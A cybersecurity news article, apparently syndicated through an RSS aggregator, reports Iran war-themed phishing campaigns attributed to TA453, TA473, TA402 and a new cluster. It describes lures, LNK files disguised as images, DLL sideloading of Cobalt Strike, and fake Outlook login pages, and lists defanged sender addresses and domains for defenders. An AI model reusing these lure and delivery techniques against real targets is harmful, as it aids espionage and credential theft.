By rssfeeds-admin 
The activity includes operations by known threat groups such as TA453 and TA473, as well as several newly tracked clusters.
Researchers say the campaigns show two clear trends. First, some actors are simply using the war as a timely topic to improve click rates.
War Lures Drive Multiple Phishing Operations
One of the most active new clusters used dramatic themes linked to the conflict, including false claims about Ayatollah Khamenei’s death and warnings that Israel might attack Gulf oil and gas infrastructure. These emails are linked to password-protected archives hosted on Google Drive.
Inside were LNK shortcut files disguised as JPG images. When opened, they launched a hidden loader that abused DLL sideloading to run a Cobalt Strike payload in memory.
Another campaign, tracked as TA402, used a compromised Iraqi government email account and an attacker-controlled Gmail address to target a Middle Eastern government entity. The messages referenced possible US military operations in Iran.
They included links that either displayed a fake document or a credential-harvesting page styled to look like Microsoft Outlook Web App, depending on the victim’s location.
TA453 and TA473 Expand The Threat Picture
Researchers also tracked TA473, also known as Winter Vivern, targeting government organizations in Europe and the Middle East. The group sent emails pretending to come from a spokesperson for the European Council President.
The attachment was an HTML file that displayed a decoy image and quietly sent HTTP requests containing the target’s email address, likely for tracking and engagement monitoring.
Meanwhile, TA453, an Iran-aligned espionage actor also known as APT42 or Charming Kitten, continued its usual intelligence-gathering activities during the war.
In one observed case, the group built rapport with a US think tank target through a believable email thread about a proofpoint roundtable on Middle East air defense.
| Threat Actor | Campaign Theme | Associated IOC / Sender | Payload / Malicious Domain |
|---|---|---|---|
| UNK_InnerAmbush | Khamenei’s death / Gulf oil attack | uzbembish@elcat[.]kg |
Photos from the scene.rar / Cobalt Strike |
| TA402 | US ground operation / Gulf alliance | ban.ali@mofa.gov[.]iq |
mail[.]iwsmailserver[.]com (OWA Phish) |
The Iran conflict is not only driving military and diplomatic tension, but also creating powerful social engineering themes for cyber threat actors.
For defenders, the risk is growing because these messages mix real events, compromised government accounts, cloud services, and tailored credential theft pages to make phishing more convincing and harder to spot.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post TA453 and TA473 Drive Iran War-Themed Phishing Across The Middle East appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.